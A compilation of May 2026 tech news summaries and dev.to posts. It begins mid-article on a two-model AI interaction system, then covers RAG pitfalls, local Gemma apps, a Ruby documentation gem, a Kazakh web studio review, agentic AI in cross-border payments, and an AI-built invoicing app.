A 200ms tick is fast enough for conversational presence, but it is not enough time for sustained reasoning, tool use, or longer-horizon work. The system splits those responsibilities across two models. The interaction model — TML-Interaction-Small
, a 276-billion-parameter mixture-of-experts with 12B active — holds the live thread, listens, speaks, watches. When the user asks for something that needs deeper work, the interaction model delegates to a background model that runs asynchronously.
The split matters because the interaction model does not freeze while the background model thinks. It keeps the conversation going — answering follow-ups, taking new input, holding the thread — and weaves background results back in when they arrive, at a moment that fits what the user is currently doing rather than as an abrupt context switch. Both models share context, so the background model is not starting cold from a stripped query; it inherits the full conversation.
The net effect for the user: planning, tool use, and agentic workflows at the response latency of a non-thinking model. The interaction model on its own is also competitive on intelligence benchmarks — 89.7 on text IFEval, 82.1 on voice IFEval — so it is not a thin front-end that punts everything to the background.
The standard interactivity benchmarks (FD-bench, Audio MultiChallenge) put TML-Interaction-Small
ahead of every other non-thinking model on the Pareto frontier of intelligence versus latency. That is a real result. But the more telling numbers are on benchmarks the team built specifically to test what an interaction model can do that a harness-wrapped turn-based model cannot.
On TimeSpeak — which asks the model to initiate speech at user-specified times with the correct content — TML-Interaction-Small
scores 64.7 versus 4.3 for GPT-realtime-2.0 (minimal). On CueSpeak, which tests speaking at the appropriate moment in response to a verbal cue, 81.7 versus 2.9. On Charades, a temporal-action-localization task adapted to require the model to say "start" and "stop" at the right moments of a video, the temporal IoU is 32.4 versus 0. On ProactiveVideoQA, where the no-response baseline scores 25.0, TML-Interaction-Small
scores 33.5 — a small absolute lift, but a meaningful one, since the baseline is essentially "say nothing and lose no points."
Scores near zero usually mean the benchmark is testing a capability the architecture cannot express. The point is not that GPT-realtime-2.0 is poor at speech — it is that turn-based plus harness has no representation for "speak while listening" or "react to a visual cue without an audio prompt." Time-aligned micro-turns do, and the benchmark gap follows.
The post is honest about what is not solved. Very long sessions still need careful context management — continuous audio and video accumulate context quickly. Streaming at low latency is sensitive to network reliability, and the experience degrades hard over a flaky connection. The current TML-Interaction-Small
is the small one — larger pretrained models exist but are too slow to serve in this regime today, and the team plans to release them later this year. The research preview will open in the coming months with a wider release after.
Source: Interaction Models: A Scalable Approach to Human-AI Collaboration, Thinking Machines Lab, May 11, 2026.

---
## Four production pitfalls that turn RAG demos into broken chatbots

> Published: 2026-05-24 06:35:19+00:00
> Source: https://dev.to/sapotacorp/four-production-pitfalls-that-turn-rag-demos-into-broken-chatbots-127o
> wpnews: https://wpnews.pro/news/four-production-pitfalls-that-turn-rag-demos-into-broken-chatbots

Based on the article, the primary reason RAG (Retrieval-Augmented Generation) chatbots fail in production is that internal demo questions are written by people familiar with the knowledge base, while real users ask long-tail queries the system cannot answer. The article identifies four key pitfalls: vector search returning irrelevant chunks without a "nothing matched" mode, using a single chunk size for diverse content types, failing to monitor embedding drift as the corpus grows, and lacking a router to handle multi-hop queries. Solutions include setting a similarity threshold, implementing a faithfulness check, using content-type-specific chunking, and adding observability tools.

A common pattern we see: a Series A team builds a RAG assistant, runs a 50-question internal demo, ships to production, and within two weeks the support inbox is full of "the AI gave me a wrong answer" tickets. Nothing changed between Tuesday's demo and Friday's outage. The same model, the same retrieval, the same prompt template.
What changed is the question distribution. Internal demos are written by people who already know the corpus. Production users are not. The four failure modes below show up almost every time.
Vector search does not have a "nothing matched" mode. It returns the top-k closest chunks regardless of whether any of them actually answer the question. Cosine similarity of 0.62 looks roughly like cosine similarity of 0.78 to a model that just consumes the chunks as prompt context.
The result is a confident hallucination on every long-tail query. A user asks about a feature the team has not documented yet, and the assistant returns a fluent paragraph stitched together from the closest tangentially related content. The user has no way to know the answer is wrong.
The Sapota fix is two-pronged. First, set a similarity floor (typically cosine 0.7 to 0.75 depending on the embedding model) and return "I do not have this in my knowledge base" when the top result falls below it. Second, add a faithfulness check using either Ragas or a smaller LLM-as-judge that verifies the generated answer is grounded in the retrieved context before it ships to the user. The faithfulness gate alone catches around 40% of the hallucinations we see in audits.
Most teams pick chunk_size=512 because that is the default in the framework they started with, and never look at it again. This is fine for blog-post-style content. It is not fine for a corpus that mixes blog posts, research papers, code documentation, and contracts.
Two failure modes follow:
The Sapota playbook is to pick chunk size per content type, not per corpus. Markdown documentation gets recursive splitting on headings. Research papers get hierarchical chunking with parent-section metadata. Contracts get section-level chunks with cross-reference resolution. The infrastructure cost of mixing strategies is small. The recall difference is not.
If the corpus is genuinely homogeneous, run a sweep at 256, 512, and 1024 tokens against a 100-question eval set and pick the winner. Do not eyeball it.
This is the one that quietly kills RAG products six months in. The team ships, things look fine, the founder moves on to the next feature. Three months later the corpus has grown by 40%, the embedding distribution has drifted, and recall has dropped from 85% to 62%. Nobody notices because nobody is looking.
The minimum observability stack we ship with every RAG project:
The expensive version of this is a full LLMOps platform. The cheap version is a Postgres table, a cron job, and a Slack webhook. Both work. What does not work is having neither.
User asks: "Which of our enterprise customers complained about the new pricing tier in Q4?" This is a three-hop question: find enterprise customers, filter by Q4 timeframe, find the ones with complaints about pricing. A single vector search over a chunked CRM corpus will not find the answer. It will find chunks that mention "enterprise" and "pricing" and stitch together something plausible.
The fix is one of three patterns, depending on how often these queries show up:
The default we recommend is to add a router as the first step. A small fast model (Llama 3.1 8B is enough) classifies whether the query is single-hop, multi-hop, or structured, and dispatches accordingly. The cost is one extra LLM call per query. The accuracy gain on the 15 to 25% of queries that are actually multi-hop is worth it.
When a team brings us in after a launch goes wrong, the first 48 hours are diagnostic, not engineering. We ask for:
The query log usually shows that 60% of production queries fall outside the distribution the eval set covered. The eval set was written by the engineers, who think like engineers. Production users ask questions in a different shape.
The diagnostic deliverable is a one-page document mapping each user complaint to which of the four pitfalls caused it, with a recommended fix and the order to ship them in. Most teams can ship the highest-impact two fixes in the first week and recover 70% of the lost user trust.
If the AI assistant your team shipped is getting worse instead of better, or if the eval scores look fine but the user feedback says otherwise, that is the gap an audit closes. Sapota runs a fixed-scope two-week diagnostic engagement that produces the document above plus the implementation plan for the first three fixes.
Reach out via the AI engineering page with a description of what you are seeing in production. The first conversation is free and almost always surfaces at least one of the four pitfalls within thirty minutes.

---
## Active Page: Tackling Local AI for Transforming Passive Reading into Active Recall

> Published: 2026-05-24 06:35:06+00:00
> Source: https://dev.to/muhammad_dafi_5eebbcb5d63/active-page-tackling-local-ai-for-transforming-passive-reading-into-active-recall-4hoj
> wpnews: https://wpnews.pro/news/active-page-tackling-local-ai-for-transforming-passive-reading-into-active

Active Page is a local-first application that uses the Gemma 4 E2B model to combat the "forgetting curve" by automatically generating contextual quizzes from reading material. It runs entirely on the user's machine for zero operational costs and privacy, featuring a streak system to encourage daily learning habits. The app optimizes performance through techniques like prefix caching and an asynchronous pre-fetching pipeline to minimize latency and maintain reading immersion.

This is a submission for the Gemma 4 Challenge: Build with Gemma 4
Most readers suffer from the "forgetting curve." By the time we finish the later chapters of a dense book, the foundational concepts from the introduction have already begun to blur.
As a middle school student trying to learn something new with reading books and scientific journal article, I wanted a better way to retain knowledge. My inspiration came from observing National Science Olympiad winners, my friend and other figure, who maintain peak retention not through passive rereading, but through consistent daily answering a lot of questions.
Active Page is a local-first application that transforms passive reading into an interactive learning experience. It automatically generates high-quality, analytical, and contextual quizzes directly from your reading material for immediate memory reinforcement. To help users build a sustainable learning habit, Active Page also features a built-in streak mechanics system to keep readers motivated daily. 🔥🔥
Because Active Page run locally, it has operational costs at zero (beside the use of the device) and side benefit of reading books without internet. While local compute constraints often drive developers toward over-engineering, Active Page takes a more elegant path.
Active Page is a privacy-first, local-LLM-powered reading companion designed to solve the "forgetting curve." By leveraging the cutting-edge Gemma 4 E2B model, it transforms passive reading into an interactive learning session through real-time, contextual active recall—running entirely on your machine.
The init.sh
script automates the heavy lifting: it manages dependencies via uv, compiles llama.cpp for your specific hardware, and pulls the optimized Gemma 4 E2B weights.
bash init.sh
Note for Silicon/AMD: If using Apple M-Series or AMD GPUs, edit init.sh to enable GGML_METAL=ON or GGML_HIPBLAS=ON respectively for hardware acceleration.
Launch the inference engine and the interactive web interface simultaneously:
bash run.sh
Access the application at: http://localhost:8000
System Crashing / Out of Memory in the init.sh If your ram or CPU is limited, adjust the pararrel of building…
I selected the Gemma-4-E2B model because it perfectly balances performance and efficiency for local deployment. It leverages Per-Layer Embeddings (PLE) and a hybrid attention mechanism combining Sliding Window Attention (SWA) with Grouped Query Attention (GQE). This architecture allows it to have 128K context window while deliver output quality that rivals much larger models while remaining lightweight and fast enough for edge devices.
Beyond simply powering the app, Gemma-4-E2B design unlocked sophisticated long-context capabilities on-device. Its compact size enables aggressive KV cache usage for manipulation, which is essential for maintaining a seamless, responsive reading experience with active recall across extended contexts.
The "memory" of an AI (KV Cache) is usually treated as a linear path. In most apps, the book data is treated as a fresh prompt every time, which is slow and memory-intensive.
The "memory" of an AI (KV Cache) is usually treated as a linear path. In most apps, the book data is treated as a fresh prompt every time, which is slow and memory-intensive.
I inverted this structure to maximize Prefix Caching:
For tackling memory constrain and decode speed, we use this technique to solved it, which also come from google.
Even with an optimized KV cache, generating multiple-choice questions (MCQs) quiz requires a slight processing window. Forcing a reader to wait at a loading spinner when a quiz triggers would break their reading immersion.
Active Page completely cut local execution latency by decoupling the generation engine from the UI through an Asynchronous Pre-Fetching Pipeline:

---
## TerraSight Offline Satellite Analysis Powered by Gemma 4

> Published: 2026-05-24 06:30:54+00:00
> Source: https://dev.to/hyster_alan_cae6913e040c6/terrasight-offline-satellite-analysis-powered-by-gemma-4-2nkk
> wpnews: https://wpnews.pro/news/terrasight-offline-satellite-analysis-powered-by-gemma-4

**Summary:** TerraSight is an offline geospatial analysis tool that processes raw Landsat 9 satellite data on a user's local machine to compute vegetation health (NDVI), urban coverage (NDBI), and land surface temperature (LST). It uses Google's Gemma 4 E4B model, running locally via Ollama, to provide contextual AI explanations of the computed statistics without requiring cloud processing or GIS expertise. The tool is designed for non-specialists like farmers and students, ensuring data privacy by keeping all analysis and AI inference on the user's hardware.

*This is a submission for the Gemma 4 Challenge: Build with Gemma 4*

## What I Built

TerraSight is a geospatial analysis tool that runs entirely on your machine. You upload raw Landsat 9 satellite band files, draw a study boundary, and the app computes three indices: NDVI (vegetation health), NDBI (urban surface coverage), and LST (land surface temperature), then renders calibrated colour maps and lets you interrogate the results through an AI chat interface.

No cloud processing. No API keys. No data leaving your machine.

The problem I was solving is straightforward: satellite imagery analysis has always sat behind expensive software licenses (ENVI, ArcGIS) or required GIS expertise most people don't have. Farmers checking crop stress, students doing fieldwork, community researchers tracking urban heat, they don't need a commercial GIS suite. They need something that takes a file, does the math correctly, and explains what the numbers mean in plain language.

That last part is where Gemma 4 comes in.

## Demo

## Code

**GitHub:** [github.com/HysterAlan1/terrasight-geoai](https://github.com/HysterAlan1/terrasight-geoai)

The project is split into two files by design:

-
`gis_engine.py`

— all geospatial computation, radiometric scaling, and AI logic. No Streamlit. You can import it directly into a notebook or script. -
`app.py`

— the Streamlit UI. It calls the engine, handles session state, and renders everything. Nothing that touches pixels lives here.

The processing pipeline applies official USGS Collection 2 Level-2 scale factors to convert raw digital numbers into physical values:

```
# Optical bands → surface reflectance
reflectance = np.clip((DN * 0.0000275) - 0.2, 0.0, 1.0)

# Thermal band → Celsius
lst = (DN * 0.00341802) + 149.0 - 273.15
```

Pixels where any optical band reads zero get masked to `NaN`

before any index is computed. This matters — skipping that step would quietly corrupt NDVI and NDBI values for no-data areas without raising any error.

## How I Used Gemma 4

I used **Gemma 4 E4B** running locally via Ollama.

The choice of E4B was deliberate. The use case is offline; the whole point of the tool is that your satellite data stays on your machine. E4B runs comfortably on consumer hardware without a GPU, which means it works on the kind of laptop a park ranger or agriculture student actually has. A larger model would have defeated the purpose.

Gemma 4 handles two things in TerraSight:

**1. Contextual interpretation**

Every time a user sends a message in the AI terminal, Gemma receives the actual computed statistics, not just the question, as part of its context:

```
prompt = (
    f"NDVI={mean_ndvi:.3f}, NDBI={mean_ndbi:.3f}, LST={mean_lst:.1f}°C, "
    f"location={place}. User asks: {user_input}. Answer concisely."
)
```

This means the model's answers are grounded in the real numbers from that specific scene, not generic satellite literacy. Ask it, "Why is the LST so high in the centre?" and it answers in terms of the actual value you computed, not a textbook definition of urban heat islands.

**2. Graceful degradation**

I also built a keyword-based rule engine that fires when Ollama is unreachable. It interprets the three index values using threshold tables and routes the answer based on what the user appears to be asking. This means the tool remains fully functional without AI Gemma, but the analysis doesn't break without it.

What I found working with E4B: it handles domain-specific questions well when the numbers are injected directly. Vague prompts get vague answers. Specific prompts, "NDVI=0.21, location=Lagos, why is vegetation this low?", get genuinely useful responses. The model responds well to being given context rather than being expected to know it.

## Why This Project Matters

Most satellite analysis tools assume you already understand the data. They display a map and leave interpretation to the user. TerraSight flips that the map is secondary to understanding what the map means.

That shift matters most for the people who aren't GIS professionals but still have legitimate reasons to analyse land cover: a farmer assessing crop stress after a dry month, a local government tracking heat island growth, a student building a remote sensing project for the first time. None of them needs ENVI. They need something that takes their files, applies the correct math, and tells them what they're looking at.

Gemma 4 E4B makes that possible without a cloud subscription or a data privacy tradeoff. The model is small enough to run locally, capable enough to interpret geospatial statistics coherently, and fast enough that the chat interface feels responsive rather than like waiting for an API call.

*Built with Python, Streamlit, Rasterio, GeoPandas, and Gemma 4 E4B via Ollama.*

*Data from USGS EarthExplorer (Landsat 9 Collection 2 Level-2).*

---
## yard-fence 0.9.0: cleaner YARD docs when Markdown braces get in the way

> Published: 2026-05-24 06:29:36+00:00
> Source: https://dev.to/galtzo/yard-fence-090-cleaner-yard-docs-when-markdown-braces-get-in-the-way-2683
> wpnews: https://wpnews.pro/news/yard-fence-0-9-0-cleaner-yard-docs-when-markdown-braces-get-in-the-way

yard-fence 0.9.0 is a Ruby gem that preprocesses Markdown files to prevent YARD from generating noisy `InvalidLink` warnings caused by braces in code examples or placeholders. The update introduces explicit Rake-driven documentation processing, replacing the previous global `at_exit` post-processing to avoid unintended file modifications during unrelated Rake tasks. The gem creates temporary fenced copies of Markdown files for YARD to read, ensuring generated documentation retains copy-pastable code examples without altering source files.

🤺 yard-fence
0.9.0 is out.
This is the first blog post I have written for the gem, so I will start with the short version:
yard-fence
is a Ruby gem that helps YARD generate cleaner documentation from Markdown files that contain braces.
If you have ever had README examples, inline code, or template placeholders like {issuer}
or {{TOKEN}}
cause noisy YARD InvalidLink
warnings, yard-fence
exists for that problem.
YARD is great at generating Ruby API documentation, and it can include Markdown content like a README in the generated docs. The trouble starts when Markdown content contains brace-heavy examples.
That can happen in a lot of normal documentation:
Use `{issuer}` as the issuer placeholder.
``` ruby
config.headers = { "Authorization" => "Bearer {{TOKEN}}" }
```
Those braces are ordinary text to the author, but YARD can interpret brace content as reference/link syntax. The result is documentation noise, usually in the form of InvalidLink
warnings.
Ignoring those warnings is tempting, but it weakens the signal from the documentation build. Once a build always emits known warnings, new warnings are easier to miss.
yard-fence
puts a small preprocessing fence around the Markdown files YARD reads.
During the Rake-based YARD workflow, it:
tmp/yard-fence/
{}
braces afterwardThe important part: your generated docs still contain copy-pastable code examples.
The conversion is temporary staging for YARD, not a change to your source files.
The main 0.9.0 change is that documentation processing is now explicitly Rake-driven.
Projects should define their YARD task, then call:
Yard::Fence.install_rake_tasks!(:yard)
That wires yard:fence:prepare
before the selected YARD task and runs HTML post-processing after the YARD task completes.
This release also removes global at_exit
post-processing. That is intentional. Raw yard
or bin/yard
does not run the full yard-fence
workflow anymore unless the caller invokes the Rake-integrated documentation task.
The practical fix in 0.9.0: loading YARD during unrelated rake tasks no longer clears or rewrites docs/
.
With Bundler:
bundle add yard-fence
Or install the gem directly:
gem install yard-fence
Use the Rake integration so the prepare and postprocess steps run around the YARD build:
require "yard"
require "yard/fence"
YARD::Rake::YardocTask.new(:yard) { |t| t.files = [] }
Yard::Fence.install_rake_tasks!(:yard)
Then build docs with:
bundle exec rake yard
If your project exposes bin/yard
, treat it the same as raw yard
: it runs YARD itself, but it does not run the yard-fence
Rake integration.
Point YARD at the staged Markdown/TXT files:
--plugin fence
-e yard/fence/hoist.rb
--readme tmp/yard-fence/README.md
--charset utf-8
--markup markdown
--markup-provider kramdown
--output docs
'lib/**/*.rb'
-
'tmp/yard-fence/*.md'
'tmp/yard-fence/*.txt'
This keeps YARD away from the unsanitized originals during the documentation build.
yard-fence
has a few small controls:
For example, if Markdown files were removed and you want to avoid stale generated pages:
YARD_FENCE_CLEAN_DOCS=true bundle exec rake yard
The tmp/yard-fence/
staging directory is always cleared automatically before regeneration.
🤺 If your YARD docs have noisy brace-related InvalidLink
warnings, give yard-fence
a try.

---
## I Reviewed 9 Web Dev Studios in Kazakhstan Before Picking One — Here's What I Found (and Why the Stack Choice Shocked Me

> Published: 2026-05-24 06:25:09+00:00
> Source: https://dev.to/alterbing/i-reviewed-9-web-dev-studios-in-kazakhstan-before-picking-one-heres-what-i-found-and-why-the-41id
> wpnews: https://wpnews.pro/news/i-reviewed-9-web-dev-studios-in-kazakhstan-before-picking-one-here-s-what-i-and

After auditing nine web development studios in Kazakhstan, the author found that eight of them relied on PHP/Laravel, WordPress, or proprietary CMS systems with restrictive licensing, which were unsuitable for scalable projects. The ninth studio, Amanix, stood out by recommending a modern stack (Go backend, Vue 3/Nuxt 3 frontend, PostgreSQL, Docker) with full code ownership and a clean, stateless architecture, delivering a landing page, user portal, and cross-platform mobile app without rewrites. The author concludes that asking about the backend language and post-delivery code ownership effectively filters out most vendors in the region.

I'm a backend developer. When our startup needed a web presence and a mobile app, we decided to outsource the frontend and infrastructure — we didn't have the bandwidth to do it ourselves. I spent about three weeks auditing studios in Kazakhstan before making a decision. This post is that audit.
Why I audited instead of just picking
I've seen enough projects fail from bad vendor choices to know that the "discovery call" is theater. I asked every studio the same five questions before anything else:
The answers sorted the market instantly.
What 8 out of 9 studios said
PHP/Laravel — 4 studios. WordPress — 2 studios. "Our own CMS" — 2 studios. One of the "our own CMS" shops actually had good design work, but when I pushed on what "our own CMS" meant for code ownership, the answer was basically: you get a license to use it, not the source. Hard pass.
The PHP/Laravel shops weren't bad per se, but the architectures I saw in their portfolios were service-less monoliths. Fine for a brochure site, completely wrong for what we needed.
What the 9th studio said
Amanix (studio.qbix.kz) answered: Go backend, Vue 3 + Nuxt 3 frontend, PostgreSQL + Redis, Docker, CI/CD on GitHub Actions, full deployment included. Code ownership: complete transfer after final payment. Multilingual: separate URL paths per language with hreflang, not a toggle. Extension vs rewrite: extend — the architecture separates HTTP handlers, services, repositories, and domain models from day one.
I asked a follow-up: stateless or stateful backend? Answer: stateless. Sessions in Redis. This means horizontal scaling without re-architecting. I've worked with enough Go backends to know this is the right answer, and most PHP monoliths get it wrong.
The technical audit
I asked them to walk me through their typical project structure. Here's what they described:
/cmd — application entry points
/internal
/handler — HTTP layer only, no business logic
/service — business logic, depends on interfaces
/repository — data access, SQL via pgx
/domain — models, interfaces, no dependencies
/migrations — golang-migrate versioned schema
/docs — OpenAPI/Swagger specs
Clean separation of concerns. The handler layer touches HTTP, nothing else. Business logic lives in services and depends on interfaces, not concrete types. This means you can swap the database layer without touching business logic. Repositories use pgx connection pooling, which matters at any meaningful traffic level.
Frontend: Nuxt 3 with SSR for public pages. TypeScript everywhere, no exceptions. Pinia for state. Component architecture with Composition API.
Mobile: Capacitor — the same Vue 3 codebase runs in the browser and compiles to native iOS/Android. One budget, two stores. The Go backend handles both via the same REST API with JWT auth and RBAC.
What we built
We came in needing a landing page and a mobile app. We ended up with a landing page, a user portal with role-based access, and cross-platform mobile app — all on the same codebase. The landing was live in 10 business days (contractual deadline, held). The portal followed in month 3. The app was in both stores by month 6. No rewrites between any of these stages.
Deployment: they set up the VPS (Linux), Docker Compose, Nginx reverse proxy, Let's Encrypt with auto-renewal, GitHub Actions for CI/CD. I received SSH access, domain credentials, database access, and 7 documentation files on final delivery: README, ARCHITECTURE, API, DATABASE, DEPLOY, ENVIRONMENT, CHANGELOG.
The honest verdict
Go in commercial web development is nearly absent from the Kazakhstani market. Amanix is an anomaly — and that anomaly directly translated to a project that's still running without architectural debt 14 months later.
If you're evaluating vendors in Kazakhstan or Central Asia and you need anything beyond a static brochure site: ask them what their backend language is and what happens to the code after delivery. Those two questions will filter out 90% of the market.

---
## How Agentic AI Is Changing Cross-Border Payments (and What It Means for Developers)

> Published: 2026-05-24 06:21:36+00:00
> Source: https://dev.to/afriex/how-agentic-ai-is-changing-cross-border-payments-and-what-it-means-for-developers-3m12
> wpnews: https://wpnews.pro/news/how-agentic-ai-is-changing-cross-border-payments-and-what-it-means-for

Agentic AI is transforming cross-border payments by enabling systems to autonomously plan, execute, and manage multi-step workflows—such as real-time treasury optimization and payment orchestration—without requiring human approval for each step. This shift moves orchestration logic from developer code to the AI model, allowing developers to expose capabilities as tools rather than writing conditional scripts. However, this autonomy raises significant legal and liability challenges, as existing financial laws and authorization frameworks were built around the assumption that a human authorizes each transaction.

For most of the last decade, AI in payments meant one thing: fraud detection. A model sitting downstream, flagging suspicious transactions after the fact. Useful, but passive. The system still required a human or deterministic code to decide what to do next.
That is changing fast. Agentic AI emerged as the breakout technology of 2025, moving from demos into regulated payment workflows. The difference is not the model. It is the architecture. Agentic systems do not just classify or predict. They plan, execute multi-step workflows, and take action across external systems without a human in the loop for every step. In payments, that shift has real consequences for how infrastructure gets built and what developers need to understand.
The term gets used loosely, so a working definition is worth establishing. An AI agent in a payment context is a system that receives a high-level goal, decides what sequence of API calls to make to achieve it, executes them, handles failures, and reports the outcome, with no human approving each individual step.
The IMF's May 2026 note on agentic AI in payments describes the scope of experimentation as expanding rapidly: from fraud detection and compliance monitoring to treasury optimization and cross-border payment orchestration. Fenwick's 2026 agentic payments analysis draws the line clearly: unlike traditional autopay automation, agentic AI makes decisions and takes actions to achieve goals. It is not executing a predefined script.
The practical difference for a developer is this: instead of writing code that calls get_balance
, evaluates the result, and conditionally calls create_transaction
, you expose those capabilities as tools and let the model decide the sequence based on a stated goal. The orchestration logic moves from your codebase to the model. The code you write shrinks. The capability surface expands.
A March 2026 analysis of earnings calls across 24 companies in the cross-border payments space found AI mentions surging significantly year over year. The themes were not hypothetical. NatWest said AI agents can "execute complex banking workflows" on behalf of customers. Remitly announced plans to deploy agentic technology across productivity, fraud reduction, and decision-making in 2026.
Agentic AI is moving toward anticipating intent, verifying identity, detecting fraud, and authorizing transactions in real time across platforms, all in a single autonomous workflow rather than across separate systems. Compliance teams are using agentic AI to shift from static rule-based watchlist screening to continuous, trigger-based monitoring. Watchlist screening currently generates 90 to 95 percent false positives, and agentic systems with richer contextual reasoning are actively pushing that number down.
For cross-border payment infrastructure specifically, the primary application is treasury optimization and payment orchestration. Cross-border flows hit $190 trillion annually and legacy systems still route most of that through multi-step correspondent banking chains. Agentic payment systems can evaluate multiple rail options in real time, select the optimal one for a given corridor and amount, monitor for settlement status, and escalate to a human only when a transaction falls outside expected parameters.
The IMF note identifies what it calls a central architectural challenge: as AI agents gain the ability to initiate and execute payment transactions autonomously, the traditional assumption that a human authorizes each individual transaction breaks down. The legal and liability frameworks built around that assumption do not map cleanly onto autonomous agent behavior.
Existing financial and consumer protection laws built around human-decisioned transactions may not appropriately address the challenges raised by agentic payments. Companies building agentic payment automation need to navigate unsettled questions under AI laws, money transmitter regimes, and authorization frameworks simultaneously.
For developers, this creates two concrete requirements. First, every action an agent takes on behalf of a user must be logged with enough detail to reconstruct exactly what the agent decided, what information it had at the time, and what it executed. Immutable audit logs are not a nice-to-have in agentic payment systems. They are the primary mechanism for accountability. Second, agent scope must be explicitly bounded. An agent authorized to send payroll disbursements should not be able to initiate arbitrary transactions outside that context. Tool-level permission scoping, not just API key permissions, is the right model here.
The shift toward autonomous payment systems changes the requirements for the payment APIs agents build on. These requirements are stricter than what human-driven integrations demand.
Tool descriptions carry the same weight as endpoint documentation. When a human developer integrates an API, they read the docs and write code. When an AI agent integrates a payment API, it reads the tool descriptions and decides what to call. An ambiguous tool description produces wrong agent behavior the same way an ambiguous endpoint contract produces bugs. Payment infrastructure providers who want their APIs used in agentic payment workflows need to treat tool descriptions as a first-class product concern.
Error responses need to be machine-interpretable, not just human-readable. An agent that receives "Something went wrong" cannot decide whether to retry, escalate, or abort. Structured error codes like INSUFFICIENT_BALANCE
, FX_RATE_EXPIRED
, and PAYMENT_METHOD_INVALID
give the model the information it needs to make the right decision without human intervention.
Transaction status granularity matters more than it did before. In a human-driven integration, a developer can decide how to handle an ambiguous status. In an agentic payment workflow, the agent needs enough signal to act correctly on its own. A payment API that returns PENDING
for multiple distinct states forces the agent to guess. A well-designed one surfaces the full status vocabulary the underlying network produces: PENDING
, PROCESSING
, IN_REVIEW
, COMPLETED
, FAILED
, REJECTED
, RETRY
, REFUNDED
. Each status maps to a different agent decision. IN_REVIEW
means wait and poll. RETRY
means the network is handling it. REJECTED
means surface to a human. The Afriex Business API exposes exactly this vocabulary on every transaction, which is one reason it is well-suited as infrastructure for agentic payment automation.
Idempotency is non-negotiable. Agents retry. Networks fail. Without idempotency keys, payment APIs risk duplicate transactions that are costly and difficult to reverse. An autonomous payment system without idempotent operations is a double-payment incident waiting to happen. The Afriex SDK accepts an idempotency key on every transaction creation call, which means retrying a failed disbursement job is safe by design.
For developers building agentic payment automation for African markets, the infrastructure complexity is higher than most global payment APIs assume, and the choice of payment API matters more as a result.
Mobile money is the dominant payment rail in East and West Africa, not cards and not bank transfers. FX volatility in corridors like NGN/USD means a rate that is valid at the moment an agent job is created may be meaningfully different at the moment of settlement. Transaction statuses like IN_REVIEW
reflect real compliance holds that African payment networks produce, not just generic processing delays. An agent operating in this environment needs access to tools that reflect those realities rather than abstracting them away.
The Afriex Business API is built against this infrastructure directly. Mobile money, bank transfers, SWIFT, and local payment channels are all first-class integrations. Exchange rates are live across NGN, KES, GHS, GBP, and other African corridor pairs. The Afriex MCP server exposes the full API surface as 22 callable tools for agentic workflows: get_rates
for live rates before committing to a disbursement, get_balance
to verify funds before a payroll run starts, resolve_payment_method
to verify a recipient account before attaching it, create_transaction
with idempotency key support, and get_transaction
for status polling after execution. The full transaction status vocabulary, including IN_REVIEW
, RETRY
, and REJECTED
, is surfaced through webhooks so an agent always has enough signal to decide its next action correctly.
Build now: agentic payroll disbursement. The use case is clear, the failure modes are well-understood, and the liability surface is bounded because a human approves the payroll run before the agent executes it. The agent's autonomy is scoped to execution, not authorization. This is the lowest-risk entry point for agentic payment automation and has the most direct ROI. The architecture for this, including how it integrates with the Afriex Business API, is covered in the companion architecture document.
Build now: agentic FX monitoring and settlement timing. An agent that watches a currency corridor, evaluates whether the current rate is within a threshold, and triggers settlement when conditions are met is straightforward to implement using the Afriex MCP server's get_rates
tool on a schedule. It is immediately valuable for any business running frequent cross-border payment flows.
Watch: fully autonomous payment authorization. Agents that can initiate arbitrary payments based on their own assessment of conditions, without a human approving each batch, sit in genuinely unsettled legal territory. The legal framework for autonomous payment authorization is unresolved, and building ahead of regulatory clarity is a risk most developers should not take on without specific legal guidance.
Watch: multi-agent payment orchestration. Chains of agents handing off payment decisions to each other across organizational boundaries are one of the most technically and legally complex areas in agentic AI right now. The IMF note identifies this as a central challenge. The infrastructure protocols for secure multi-agent communication across payment networks are still being standardized.
Agentic AI does not change what cross-border payment infrastructure needs to do. It changes who is doing the orchestrating. The requirements for the underlying payment API layer get stricter as a result: machine-interpretable error codes, granular transaction status vocabularies, idempotent operations, and tool descriptions precise enough for a model to act on correctly without human clarification.
For developers, the opportunity in agentic payment automation is real and immediate in bounded use cases. The risk is real too, and proportional to how much autonomous authorization you give the agent. Start with execution autonomy, keep authorization human, and build the audit trail as if regulators will read it. Because eventually, they will.

---
## I Didn't Write a Single Line of Code. I Built It Anyway.

> Published: 2026-05-24 06:20:42+00:00
> Source: https://dev.to/mikecase/i-didnt-write-a-single-line-of-code-i-built-it-anyway-3ln
> wpnews: https://wpnews.pro/news/i-didn-t-write-a-single-line-of-code-i-built-it-anyway

The author, a non-traditional developer with a background in the U.S. Army and automotive repair, built a full-stack invoicing application for his home mechanic business using AI tools, spending only $0.50 in API tokens and completing the project in one day without writing any code. He argues that while AI generated the code, his domain expertise—gained from years of hands-on mechanical work—was essential for specifying features like parts-first invoice sorting and internal time tracking, which generic software lacks. The author concludes that AI, like the calculator before it, elevates skilled practitioners rather than replacing them, but warns that success requires deep understanding to direct the technology and catch its mistakes.

I'm not a traditional developer. I don't have a CS degree. I learned to code at 13 on Visual Basic 3.0, spent 9 years in the U.S. Army including 3 combat deployments to Iraq, came home, spent 15+ years as an automotive technician, and somewhere in between all of that never stopped learning technology.
I run a homelab that would have been considered enterprise infrastructure in the late 90s, It's amazing what's changed in 26 years. Self-hosted git, SSO, secrets management, a zero-trust network architecture, local LLMs, workflow automation. I built all of it myself. I am not telling you this to brag. I'm telling you this so you understand where I'm coming from when I talk about AI.
I needed an invoicing application for my side business as a home mechanic. There are plenty of automotive invoicing solutions out there — Mitchell1, Shop-Ware, Tekmetric — but they're built for full shops with full shop budgets. Subscriptions running $100-300+ a month for a guy doing side work out of his garage doesn't make a lot of sense.
Beyond the cost though, there's a principle at stake. I self-host everything. My password manager, my git repos, my search engine, my AI. Why would I hand my customer data, my vehicle history, and my business financials to a SaaS platform I don't control, for a small home business that doesn't need enterprise features?
So I built exactly what I needed. Nothing more, nothing less.
But not just a simple "create invoice, send invoice" app. I needed something that actually understood how a mechanic's business works:
These aren't features you find in generic invoicing software. They're features that only make sense if you've actually done the work.
The result is a full-stack Flask/Python application with:
Stack: Python 3.12, Flask, SQLite (WAL mode), Jinja2, Bulma CSS,
WeasyPrint.
I did not write a single line of code.
I spent $0.50 in API tokens using opencode with a custom provider, stated what I wanted, made sure my agents.md was appropriate for the project, had the AI plan the architecture, then build it.
Total cost: $0.50.
Total time: One day.
Here's where I expect some people to roll their eyes.
"You didn't build that. The AI built that."
And I'd push back on that — hard.
What I did was:
